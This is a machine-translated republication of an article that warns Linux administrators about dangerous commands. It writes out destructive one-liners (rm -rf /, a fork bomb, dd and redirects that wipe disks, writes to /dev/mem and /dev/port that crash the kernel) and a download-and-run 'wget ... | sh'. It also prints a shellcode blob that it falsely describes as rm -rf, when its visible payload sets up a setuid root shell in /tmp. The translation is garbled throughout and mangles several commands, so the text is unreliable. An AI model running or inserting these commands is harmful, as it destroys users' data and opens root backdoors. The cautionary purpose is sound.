Never use Linux commands! | Linux China, linux China
You only need a stupid move. You can even destroy a company worth billions of dollars, Just Like Apache Struts without patching. -- Steven Vaughan-Nicolas
In this article, navigate to rm-rf/11% faster fork bomb 39% faster junk data rewrite hard disk 47% faster erase hard disk! 54% Bytes/dev/null loss 63% bytes formatting wrong drive 69% bytes kernel crash 74% bytes beware of unknown script 80% bytes end 89% compiled from | https://www.hpe.com/us/en/insights/articles/the-linux-commands-you-should-never-use-1712.html
Author | Steven Vaughan-Nicolas
Translator | CYLeft
Unless you want to kill your machine.
Spider has such a creed: "The greater the power, the greater the responsibility ." This is also a wise attitude for Linux system administrators.
No, I really appreciate the DevOps communication and collaboration and cloud orchestration technology, so that a Linux administrator can control not only one server, but also thousands of server instances. You only need a stupid move. You can even destroy a company worth billions of dollars, Just Like Apache Struts [1] without patching.
If you cannot run the security patch, this will bring about a strategic business problem that far exceeds the salary of the system administrator. Here there are some simple ways to get rid of Linux servers in the hands of system administrators. It is easy to imagine that only new users will make these mistakes, but we need to know more.
The following are some famous commands. Any user with root permissions can use them to cause serious damage to the server.
Warning do not run these commands in the production environment, they will harm your system. Do not try it at home or in the office.
So proceed!
Rm-rf/
Do you want to easily destroy a Linux system? You cannot go beyond this classic that is hailed as "the worst in history". It can delete everything. What I'm talking about is that it can delete all content that exists in your system!
Like most Linux commands [2,rm
This core command is very convenient to use. Even the most stubborn file can be deleted for you. Understanding of the following two parametersrm
When using commands, you can easily get into trouble:-r
, Force recursively Delete All subdirectories,-f
, Force delete all read-only files without confirmation. If you run this command in the root directory, all data on the entire drive is cleared.
If you do this, think about how to explain it to the boss!
Now, you may think, "I will never make such a stupid mistake ." Friends, we are defeated. Learn from the lessons learned. This warning story comes from a post posted by a system administrator on Reddit [3]:
I have been working in the IT field for many years, but today, as the root user of the Linux system, I have run IT in the wrong system path.rm- f
To put it short, on that day, I need to copy a lot of directories from one directory to another. Like you, I typed a fewcp -R
Copy the content I need.
With my cleverness, I continued to tap on the arrow and look for similar command names that can be copied and used in Command records, but they were mixed into a bunch of other commands.
In any case, I typed on Skype, Slack, and WhatsApp web pages, while on the phone with Sage, and my attention was very dispersed.rm -R ./videodir/* ../companyvideodirwith651vidsin/
When such a command is used, the game goes beyond things.
The company's video is also included when the file is blurred. Fortunately, it's crazy.control -C
The system administrator aborted this command before deleting too many files. But this is a warning to you: Anyone may make such a mistake.
In fact, most modern operating systems will warn you with a striking text before you make these mistakes. However, if you are busy or distracted when you press the keyboard consecutively, you will type your system into a black hole. Fortunately, there may be too many people who delete the entire file system in the root directory.rm
The root directory cannot be deleted by default, unless you manually add--no-preserve-root
Parameter !)
There are some more concealed calling methodsrm -rf
. Think about the following code:
char esp[] __attribute__ ((section(“.text”))) = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68”
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99”
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7”
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56”
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31”
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69”
“\x6e\x2f\x73\x68\x00\x2d\x63\x00”
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;
What is this? This is hexadecimal.rm -rf
Statement. Do not run this command before you know the code!
Fork bomb
Since we are talking about some strange code, consider this line:
:(){ :|: & };:
This may seem mysterious to you, but I think it is the notorious Bash fork bomb [4]. It starts a new Bash shell repeatedly until your system resources are exhausted and the system crashes.
These operations should not be performed on the latest Linux system. Note: I should not. I didn't say no. Correctly set user permissions. Linux can prevent these destructive behaviors. Generally, users are limited to allocating available machine memory. But if you run this line of command (or its variant Bash fork bomb variant [5]) as the root user, you can still abuse the server until the system restarts.
Junk data rewriting Hard Disk
Sometimes you want to completely clear the data on the hard disk, you should use the Darik's Boot and Nuke (DBAN) [6] tool to complete this task.
But if you just want to mess up your memory, it's easy:
Any command>/dev/hda
The "Arbitrary Command" I am talking about refers to any command with output, such:
ls -la > /dev/hda
...... Send the directory list to your primary storage device through MPs queues. Give me the root permission and enough time to cover the entire hard disk device. This is a good way to start a day of blind panic, or you can turn it into a career ban [7].
Erased hard drive!
Another popular method to erase a hard disk is to execute:
dd if=/dev/zero of=/dev/hda
You can use this command to write data to your hard disk device.dd
Command to get endless0
Character, and write it all to your device.
Maybe it sounds like/dev/zero
It's a silly idea, but it actually works. For example, you can use it to clear unused partition space with zero [8]. It compresses the image of a partition to a smaller size for data transmission or archiving.
On the other hand, it anddd if=/dev/random of=/dev/hda
Similar, except for destroying your day, is not a good thing. If you run this command (never), your memory will be overwritten by random data. As a half-hanging method that hides the secret plan you want to take over the office coffee maker, it is good, but you can use the DBAN tool to better complete your task.
/Dev/null loss
Maybe because the data is precious, we have no confidence in the backup data. There are indeed many "never do this !" Command will cause the hard disk or other storage warehouse data to be erased. A clear example: the other way to destroy your storage device, runmv / /dev/null
Or>mv /dev/null
.
In the previous situation, as a root user, you sent the entire disk data to this hunger/dev/null
. In the latter, you only feed the home directory to this empty warehouse. In either case, you will no longer see your data unless you restore the backup.
Hell, doesn't the accountant really need the latest accounts receivable file?
Wrong drive formatting
Sometimes you need to use this command to format the drive:
mkfs.ext3 /dev/hda
...... It uses the ext3 File System to format the master hard drive. No, please wait! You are formatting your primary drive! Don't you need it?
When you want to format the drive, make sure that the partition you are formatting is the one you want to format, not the one you are using, whether they are SSD, flash drives, or other iron oxide disks.
Kernel crash
Some Linux commands cannot stop your machine for a long time. However, some commands can cause the kernel to crash. These errors are usually caused by hardware problems, but you can also crash on your own.
When you encounter a kernel crash, restart the system to restore your work. In some cases, this is a little annoying; in other cases, this is a big problem, for example, the production environment under high load operation. The following is a case:
dd if=/dev/random of=/dev/port
echo 1 > /proc/sys/kernel/panic
cat /dev/port
cat /dev/zero > /dev/mem
These will cause the kernel to crash.
Never run commands that you don't know about its functions. They are reminding me...
Watch out for unknown scripts
Young or lazy system administrators like to copy scripts from others. Why repeat the wheel? So they found a cool script and promised to automatically check all backups. They run it like this:
wget https://ImSureThisIsASafe/GreatScript.sh -O- | sh
This downloads the script and sends it to the shell for running. Well, don't make a fuss, right? No. This script may have been infected by malware. Of course, Linux is generally safer than most operating systems, but if you run unknown code as a root user, everything may happen. This hazard is not only harmful to malware, but also to the script author's stupidity. You may even eat a piece of undebugged code because you didn't take the time to read it.
Do you think you will not do that? Tell me what are the container images you run in Docker [9]? Do you know what they are running? I have seen too many system administrators who run them without verifying what is in the container. Please do not.
End
The truth behind these stories is simple. In your Linux system, you have great control. You can let your server do almost anything. However, when you use your permissions, be sure to confirm it carefully. If you don't, what you destroy is not just your server, but your work or even your company. Like Spider-Man, use your permissions responsibly.
Have I missed anything? On @ sjvn [10] Or @ enterprisenxt [11], tell me which Linux commands should never be run in your command! [12.
Via: https://www.hpe.com/us/en/insights/articles/the-linux-commands-you-should-never-use-1712.html
Author: Steven Vaughan-nickls [14] Translator: CYLeft Proofreader: wxy
This article was originally compiled by LCTT and launched with the honor of Linux in China
Cyleft? Total Translation: 1 contribution time: 4 days
Recommended articles
<Slide left and right to view related articles>
Click an image, enter the Document ID, or identify the QR code.
For the original text link, visit "Original Text Link" to obtain the link that can be clicked, full-size source images, and related articles.
Copyright Disclaimer: This article is an original article by the blogger and cannot be reproduced without the permission of the blogger. Http://blog.csdn.net/F8qG7f9YD02Pe/article/details/78988323